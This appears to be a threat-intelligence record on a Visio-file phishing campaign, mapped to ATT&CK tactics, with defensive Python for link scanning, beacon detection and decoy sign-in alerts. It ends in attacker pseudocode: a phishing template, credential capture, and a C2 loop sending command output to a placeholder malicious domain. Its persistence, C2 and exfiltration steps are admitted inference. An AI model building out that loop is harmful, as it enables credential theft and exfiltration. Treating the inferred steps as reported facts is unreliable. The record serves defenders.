Subject: Phishing by Design – Two-Step Attacks Using Microsoft Visio Files
Tactics: TA0011 Command and Control, TA0002 Execution, TA0010 Exfiltration, TA0001 Initial Access, TA0003 Persistence
Technique: T1071.001 Application Layer Protocol: Web Protocols, T1059 Command and Scripting Interpreter, T1543 Create or Modify System Process, T1041 Exfiltration Over C2 Channel, T1566.001 Phishing: Spearphishing Attachment
Procedure:
- Initial Access: Attackers compromise a legitimate email account and send phishing emails containing a malicious URL, either directly in the email body or within an attached .eml file. The email often impersonates a trusted entity and may include branding to appear legitimate. The URL leads to a compromised SharePoint page hosting a weaponized Visio (.vsdx) file.
- Execution: The Visio file contains a malicious URL hidden behind a clickable element, such as a “View Document” button. Victims are instructed to hold down the Ctrl key while clicking the element to access the URL, a technique designed to evade automated security scanners. This URL redirects the victim to a fake Microsoft login page designed to steal credentials.
- Persistence (Implied): Although not explicitly mentioned in the document, attackers likely leverage the stolen credentials for persistent access to the victim’s environment. This may involve establishing backdoors, creating new accounts, or modifying existing ones.
- Command and Control: After gaining access, attackers likely establish a command-and-control (C2) channel using application layer protocols like HTTP to communicate with the compromised system, issue commands, and manage the attack.
- Exfiltration: Attackers exfiltrate sensitive data from the victim’s environment over the established C2 channel.
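The weaponized .vsdx described above is an OPC zip of XML parts, so the hidden link behind the "View Document" element can be read out statically before anyone Ctrl-clicks it. The following scanner is an added example written for this record; it is not code from Perception Point's report. It assumes that hyperlink targets appear either as a `Cell N="Address"` inside a shape's Hyperlink section of a page part or as an external `Relationship` in a `.rels` part, and it uses a constructed allow-list (`ALLOWED_HOSTS`) and a constructed sample package built in memory.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Assumption: hosts the organisation treats as legitimate document locations.
ALLOWED_HOSTS = {"contoso.sharepoint.com"}


def extract_links(vsdx_bytes):
    """Return sorted (part_name, url) pairs for every link stored in the package.

    Two places in a .vsdx can carry a target (assumed layout):
      * page XML: a Shape's Hyperlink section row, Cell N="Address" V="<url>"
      * .rels parts: <Relationship TargetMode="External" Target="<url>"/>
    """
    links = set()
    with zipfile.ZipFile(io.BytesIO(vsdx_bytes)) as zf:
        for name in zf.namelist():
            if not name.startswith("visio/") or not name.endswith((".xml", ".rels")):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # a malformed part deserves its own finding; skipped here
            for el in root.iter():
                tag = el.tag.rsplit("}", 1)[-1]  # drop the XML namespace prefix
                if tag == "Cell" and el.get("N") == "Address" and el.get("V"):
                    links.add((name, el.get("V")))
                elif tag == "Relationship" and el.get("TargetMode") == "External" and el.get("Target"):
                    links.add((name, el.get("Target")))
    return sorted(links)


def classify(url):
    """'allowed' for known hosts, 'non-web' for non-http(s) schemes, otherwise 'suspicious'."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return "non-web"
    if (parsed.hostname or "").lower() in ALLOWED_HOSTS:
        return "allowed"
    return "suspicious"


def scan(vsdx_bytes):
    """Findings a mail gateway or sandbox can log without rendering the diagram."""
    return [{"part": part, "url": url, "verdict": classify(url)}
            for part, url in extract_links(vsdx_bytes)]


def build_sample_vsdx(address):
    """Constructed minimal package: one page, one 'View Document' shape with a hyperlink,
    plus a relationship part pointing at an allowed SharePoint host."""
    page_xml = (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<PageContents xmlns="http://schemas.microsoft.com/office/visio/2012/main">'
        '<Shapes><Shape ID="1" Type="Shape"><Text>View Document</Text>'
        '<Section N="Hyperlink"><Row N="Row_1">'
        f'<Cell N="Address" V="{address}"/>'
        '</Row></Section></Shape></Shapes></PageContents>'
    )
    rels = (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"'
        ' Target="https://contoso.sharepoint.com/sites/docs" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("visio/pages/page1.xml", page_xml)
        zf.writestr("visio/pages/_rels/page1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # "malicious-host.example" is a constructed placeholder, not an indicator from the report.
    for finding in scan(build_sample_vsdx("https://malicious-host.example/view")):
        print(finding)
```

Running `scan` on the constructed package yields one "allowed" link from the relationship part and one "suspicious" link from the page's Hyperlink section; the verdict is taken before the document is opened, which is exactly the step the Ctrl-click instruction is meant to keep automated scanners from reaching.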
Vulnerability: EAV0003: When adversaries exploit a trusted relationship, such as using an account to access or move in the environment, they are vulnerable to triggering tripwires or engaging in anomalous behavior.
Engagement Opportunity:
- User Education and Training: Conduct security awareness training focused on identifying phishing emails, recognizing suspicious links and attachments, and understanding the risks of two-step attacks.
- Network Monitoring and Threat Intelligence: Enhance network monitoring capabilities to detect suspicious traffic patterns associated with C2 communication and data exfiltration. Leverage threat intelligence to identify known malicious URLs and block access to compromised SharePoint sites.
- Deception Technology: Deploy deception assets, such as decoy files or fake login pages, to lure attackers and gather intelligence on their tools, techniques, and objectives.
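The network-monitoring opportunity above turns on spotting the HTTP C2 channel and the exfiltration that rides on it. The detector below is an added example for this record, not code from the report or from Perception Point. It assumes a proxy log with the constructed layout `<ISO time> <client IP> <host> <method> <bytes sent>` and a constructed sample in which one client posts to one host about once a minute while also browsing normally; the host name is a placeholder, not an indicator.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log sample. Assumed layout: "<ISO time> <client IP> <host> <method> <bytes sent>".
# The first six lines model a client posting to one host once a minute; the rest is ordinary browsing.
SAMPLE_LOG = """\
2024-11-12T09:00:00 10.1.2.3 update.malicious-host.example POST 412
2024-11-12T09:01:00 10.1.2.3 update.malicious-host.example POST 398
2024-11-12T09:02:01 10.1.2.3 update.malicious-host.example POST 405
2024-11-12T09:03:00 10.1.2.3 update.malicious-host.example POST 410
2024-11-12T09:04:00 10.1.2.3 update.malicious-host.example POST 399
2024-11-12T09:05:01 10.1.2.3 update.malicious-host.example POST 420
2024-11-12T09:00:12 10.1.2.3 www.microsoft.com GET 1200
2024-11-12T09:07:40 10.1.2.3 www.microsoft.com GET 980
2024-11-12T09:31:05 10.1.2.3 www.microsoft.com GET 1500
2024-11-12T09:33:00 10.1.2.3 www.microsoft.com GET 1100
"""


def parse_log(text):
    """Split the constructed log into (timestamp, client, host, method, bytes) rows."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, host, method, nbytes = line.split()
        rows.append((datetime.fromisoformat(ts), client, host, method, int(nbytes)))
    return rows


def find_beacons(rows, min_hits=5, max_cv=0.2):
    """Flag (client, host) pairs whose request intervals are regular enough to look machine-driven.

    cv = stdev(gaps) / mean(gaps). Human browsing has a cv well above 1; a fixed-sleep
    implant sits near 0 even with a little jitter. bytes_out is summed per pair so the
    same finding also answers how much has left over the channel.
    """
    by_pair = defaultdict(list)
    for ts, client, host, _method, nbytes in rows:
        by_pair[(client, host)].append((ts, nbytes))
    findings = []
    for (client, host), hits in by_pair.items():
        if len(hits) < min_hits:
            continue
        hits.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(hits, hits[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            findings.append({
                "client": client, "host": host, "hits": len(hits),
                "period_s": round(mean, 1), "cv": round(cv, 3),
                "bytes_out": sum(n for _, n in hits),
            })
    return sorted(findings, key=lambda f: f["cv"])


if __name__ == "__main__":
    for finding in find_beacons(parse_log(SAMPLE_LOG)):
        print(finding)
```

On the constructed sample the once-a-minute POSTs come out with a period of about 60 s and a cv near 0.01, while the four browsing requests never reach `min_hits`. Thresholds are deliberately parameters: a longer window and a higher `min_hits` trade detection latency for fewer false positives from software update checks, which also beacon regularly and are the usual source of noise for this rule.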
Threat Actor: Unknown, potentially sophisticated and organized group targeting multiple organizations.
Threat Objective:
Credential theft, data exfiltration, potential financial gain or espionage.
Deception Opportunity:
- Credential Decoys: Create fake login pages mimicking Microsoft 365 or other commonly used services to capture stolen credentials and track attacker activity.
- Data Decoys: Plant decoy files containing false but seemingly valuable information to lure attackers and gather intelligence on their exfiltration methods and objectives.
- Honeypots: Deploy honeypots mimicking critical systems or sensitive data repositories to attract attackers and observe their behavior in a controlled environment.
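Credential decoys only pay off if the tripwire behind them fires, which is the point EAV0003 makes: once stolen credentials are used, the adversary has to touch accounts and come from places a baseline does not know. The following sign-in-log evaluator is an added example for this record, not code from the report. It assumes a constructed decoy account (`DECOY_ACCOUNTS`), a constructed set of sign-in events with a minimal field set, and a fixed cutoff that separates trusted history from the period under review.

```python
from collections import defaultdict

# Assumption: decoy identities planted in the directory; nothing legitimate ever signs in with them.
DECOY_ACCOUNTS = {"svc-backup-archive@contoso.example"}

# Constructed sign-in events (a subset of the fields an identity provider's sign-in log carries).
SAMPLE_EVENTS = [
    {"ts": "2024-11-11T08:02:00", "user": "alice@contoso.example", "ip": "198.51.100.7",
     "result": "success", "app": "Outlook"},
    {"ts": "2024-11-11T13:15:00", "user": "alice@contoso.example", "ip": "198.51.100.7",
     "result": "success", "app": "SharePoint"},
    {"ts": "2024-11-12T10:41:00", "user": "alice@contoso.example", "ip": "203.0.113.77",
     "result": "success", "app": "Outlook"},
    {"ts": "2024-11-12T10:43:00", "user": "alice@contoso.example", "ip": "203.0.113.77",
     "result": "success", "app": "Exchange Online PowerShell"},
    {"ts": "2024-11-12T10:50:00", "user": "svc-backup-archive@contoso.example", "ip": "203.0.113.77",
     "result": "failure", "app": "Outlook"},
]

BASELINE_CUTOFF = "2024-11-12T00:00:00"  # events before this are treated as trusted history


def build_baseline(events, cutoff=BASELINE_CUTOFF):
    """Map each real user to the source IPs they successfully signed in from before the cutoff."""
    seen = defaultdict(set)
    for e in events:
        if e["ts"] < cutoff and e["result"] == "success" and e["user"] not in DECOY_ACCOUNTS:
            seen[e["user"]].add(e["ip"])
    return seen


def evaluate(events, baseline, cutoff=BASELINE_CUTOFF):
    """Two rules over the review period:
      * any attempt (success or failure) against a decoy account is critical;
      * a successful sign-in from an IP absent from the user's baseline is medium,
        reported once per (user, ip) so a burst of app logins does not flood the queue."""
    alerts, flagged = [], set()
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["ts"] < cutoff:
            continue
        if e["user"] in DECOY_ACCOUNTS:
            alerts.append({"severity": "critical", "rule": "decoy-account-use",
                           "user": e["user"], "ip": e["ip"], "ts": e["ts"]})
            continue
        key = (e["user"], e["ip"])
        if e["result"] == "success" and e["ip"] not in baseline.get(e["user"], set()) and key not in flagged:
            flagged.add(key)
            alerts.append({"severity": "medium", "rule": "new-source-ip",
                           "user": e["user"], "ip": e["ip"], "ts": e["ts"]})
    return alerts


def pivot_sources(alerts):
    """Real accounts seen from an IP that also touched a decoy: the first place to look for the
    phished user, since the same operator is working both."""
    decoy_ips = {a["ip"] for a in alerts if a["rule"] == "decoy-account-use"}
    return sorted({a["user"] for a in alerts
                   if a["rule"] != "decoy-account-use" and a["ip"] in decoy_ips})


if __name__ == "__main__":
    base = build_baseline(SAMPLE_EVENTS)
    found = evaluate(SAMPLE_EVENTS, base)
    for a in found:
        print(a)
    print("pivot from decoy:", pivot_sources(found))
```

In the constructed data the medium alert on alice's new source IP is ambiguous on its own (travel, a new home connection), but the decoy attempt from the same IP nine minutes later promotes it: `pivot_sources` links the two and names the account whose credentials most plausibly left through the fake login page.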
Sensor Data Placement: User-Mode
Observable Level: Core to Some Implementations of (Sub-)Technique
Scoring Rationale:
Link to Report: https://perception-point.io/blog/phishing-by-design-two-step-attacks-using-microsoft-visio-files/
Link to Report II.:
Additional Comments:
- Observable Level:
- Spearphishing Attachment: Core to Adversary-Brought Tool (The specific Visio file and embedded URLs are unique to this campaign)
- Command and Scripting Interpreter: Core to Pre-Existing Tool (Attackers leverage built-in Windows tools)
- Scheduled Task/Job: Core to Some Implementations of (Sub-)Technique (Scheduled tasks are a common persistence method, but not all attackers use them)
- Application Layer Protocol: Core to Adversary-Brought Tool (Specific C2 protocols and infrastructure are unique to the attacker)
- Exfiltration Over C2 Channel: Core to Sub-Technique or Technique (Exfiltration over C2 is fundamental to this data exfiltration method)
- Scoring Rationale: The scoring reflects the attacker’s use of both unique tools (Visio file, C2 infrastructure) and pre-existing system features (Windows tools). The observable levels vary based on how closely tied the observables are to the specific attacker tools and techniques.
Possible elements:
MSG (Pseudocode):
# Malicious Sub-Graph Standard
# Node Format:
# [Node ID]: [Tactic] – [Technique] – [Procedure] ([Observable Level])
# Edge Format:
# [Source Node ID] –> [Destination Node ID] ([Exploited Vulnerability])
# Example: Visio Phishing Attack Graph
[1]: Initial Access – T1566: Spearphishing Attachment – Email with malicious URL leading to Visio file on SharePoint (Core to Adversary-Brought Tool)
[2]: Execution – T1059: Command and Scripting Interpreter – User clicks "View Document" in Visio file while holding Ctrl, opening malicious URL (Core to Pre-Existing Tool)
[3]: Persistence – T1543: Create or Modify System Process – Establish persistence using stolen credentials (Implied, Core to Some Implementations of (Sub-)Technique)
[4]: Command and Control – T1071: Application Layer Protocol – Communicate with C2 server using HTTP (Core to Adversary-Brought Tool)
[5]: Exfiltration – T1041: Exfiltration Over C2 Channel – Exfiltrate data over HTTP C2 channel (Core to Sub-Technique or Technique)
1 –> 2 (Lack of User Awareness)
2 –> 3 (Exploitation of Legitimate Services)
3 –> 4 (Lack of Network Monitoring)
4 –> 5 (Lack of Network Monitoring)
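The node and edge formats defined above are regular enough to be machine-checked, which is useful when several of these records have to be compared or when a control is being mapped to the edges it would cut. The parser below is an added example for this record, not part of the MSG standard or the report. It assumes the separators exactly as the standard writes them (an en-dash between fields, `–>` for edges, with plain `-` and `->` also accepted) and uses a constructed copy of the graph above as input; `KNOWN_LEVELS` is the set of observable-level labels used in this record.

```python
import re
from collections import defaultdict

NODE_RE = re.compile(
    r"^\[(\d+)\]:\s*(.+?)\s+[–-]\s+(T\d{4}(?:\.\d{3})?):\s*(.+?)\s+[–-]\s+(.+?)\s*\((.+)\)\s*$")
EDGE_RE = re.compile(r"^(\d+)\s*[–-]>\s*(\d+)\s*\((.+)\)\s*$")

# Observable-level labels used in this record (assumption: the full vocabulary is these four).
KNOWN_LEVELS = (
    "Core to Adversary-Brought Tool",
    "Core to Pre-Existing Tool",
    "Core to Some Implementations of (Sub-)Technique",
    "Core to Sub-Technique or Technique",
)

# Constructed from the graph in the MSG block above.
SAMPLE_MSG = """\
# Example: Visio Phishing Attack Graph
[1]: Initial Access – T1566: Spearphishing Attachment – Email with malicious URL leading to Visio file on SharePoint (Core to Adversary-Brought Tool)
[2]: Execution – T1059: Command and Scripting Interpreter – User clicks "View Document" in Visio file while holding Ctrl, opening malicious URL (Core to Pre-Existing Tool)
[3]: Persistence – T1543: Create or Modify System Process – Establish persistence using stolen credentials (Implied, Core to Some Implementations of (Sub-)Technique)
[4]: Command and Control – T1071: Application Layer Protocol – Communicate with C2 server using HTTP (Core to Adversary-Brought Tool)
[5]: Exfiltration – T1041: Exfiltration Over C2 Channel – Exfiltrate data over HTTP C2 channel (Core to Sub-Technique or Technique)
1 –> 2 (Lack of User Awareness)
2 –> 3 (Exploitation of Legitimate Services)
3 –> 4 (Lack of Network Monitoring)
4 –> 5 (Lack of Network Monitoring)
"""


def parse_msg(text):
    """Return (nodes, edges, errors). Comment lines starting with '#' are skipped."""
    nodes, edges, errors = {}, [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = NODE_RE.match(line)
        if m:
            nid, tactic, tid, tname, proc, level = m.groups()
            if not any(k in level for k in KNOWN_LEVELS):
                errors.append(f"line {lineno}: unknown observable level '{level}'")
            nodes[int(nid)] = {"tactic": tactic, "technique": tid, "name": tname,
                               "procedure": proc, "level": level}
            continue
        m = EDGE_RE.match(line)
        if m:
            edges.append((int(m.group(1)), int(m.group(2)), m.group(3)))
            continue
        errors.append(f"line {lineno}: unparsed: {line}")
    for src, dst, _ in edges:
        for n in (src, dst):
            if n not in nodes:
                errors.append(f"edge {src}->{dst} references undefined node {n}")
    return nodes, edges, errors


def tactic_chains(nodes, edges):
    """Every root-to-leaf sequence of tactics; cycles are cut rather than followed."""
    out, has_in = defaultdict(list), set()
    for s, d, _ in edges:
        out[s].append(d)
        has_in.add(d)
    chains = []

    def walk(n, seen, path):
        label = nodes[n]["tactic"] if n in nodes else f"?{n}"
        path, seen = path + [label], seen | {n}
        nxt = [d for d in out.get(n, []) if d not in seen]
        if not nxt:
            chains.append(path)
        for d in nxt:
            walk(d, seen, path)

    for root in sorted(n for n in nodes if n not in has_in):
        walk(root, set(), [])
    return chains


def edges_cut_by(edges, vulnerability):
    """Edges whose exploited vulnerability a given control would remove."""
    return [(s, d) for s, d, v in edges if v == vulnerability]


if __name__ == "__main__":
    nodes, edges, errors = parse_msg(SAMPLE_MSG)
    print("errors:", errors)
    print("chains:", tactic_chains(nodes, edges))
    print("cut by network monitoring:", edges_cut_by(edges, "Lack of Network Monitoring"))
```

Two things fall out of the parse that are hard to see by eye: `tactic_chains` confirms the five nodes form a single linear kill chain, and `edges_cut_by` shows that the one "Lack of Network Monitoring" vulnerability is what carries both the C2 and the exfiltration edges, so the monitoring opportunity listed earlier breaks the chain in two places. A dangling edge (say `5 –> 9`) is reported as an error instead of silently producing a chain that ends in an undefined node.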
# Pseudocode Standard
# Function Format:
# function [Tactic]_[Technique]([Input]):
#     [Procedure]
#     return [Output]
# Example: Visio Phishing Attack Pseudocode
function Initial_Access_T1566_Spearphishing_Attachment(target_email):
    # Craft phishing email with malicious URL to Visio file on SharePoint
    email_body = """
    Dear [Target Name],
    Please review the attached document at your earliest convenience.
    Thanks,
    [Sender Name]
    """
    attachment = VisioFile(malicious_URL="https://[malicious_sharepoint]/[malicious_visio_file].vsdx")
    send_email(target_email, email_body, attachment)
    return malicious_URL

function Execution_T1059_Command_and_Scripting_Interpreter(malicious_URL):
    # User clicks "View Document" in Visio file while holding Ctrl
    # Browser opens malicious_URL (this step is user-driven)
    # Malicious URL redirects to fake login page
    display_fake_login_page(microsoft_theme=True)
    credentials = capture_credentials()
    return credentials

function Persistence_T1543_Create_or_Modify_System_Process(credentials):
    # Use credentials to establish persistence (Implied)
    # This could involve creating new user accounts, adding SSH keys, etc.
    if credentials.type == "ssh":
        add_ssh_key(credentials.username, credentials.key)
    elif credentials.type == "user_account":
        create_user(credentials.username, credentials.password)
    return C2_communication_module

function Command_and_Control_T1071_Application_Layer_Protocol(C2_communication_module):
    # Establish HTTP connection with C2 server
    C2_server = "https://[malicious_domain]"
    establish_connection(C2_server)
    # Receive commands and exfiltrate data
    while True:
        command = receive_command(C2_server)
        result = execute_command(command)
        send_data(C2_server, result)
    return "C2 communication established and ongoing"

function Exfiltration_T1041_Exfiltration_Over_C2_Channel(exfiltrated_data):
    # Exfiltration is handled within the C2 communication loop
    return "Exfiltration successful"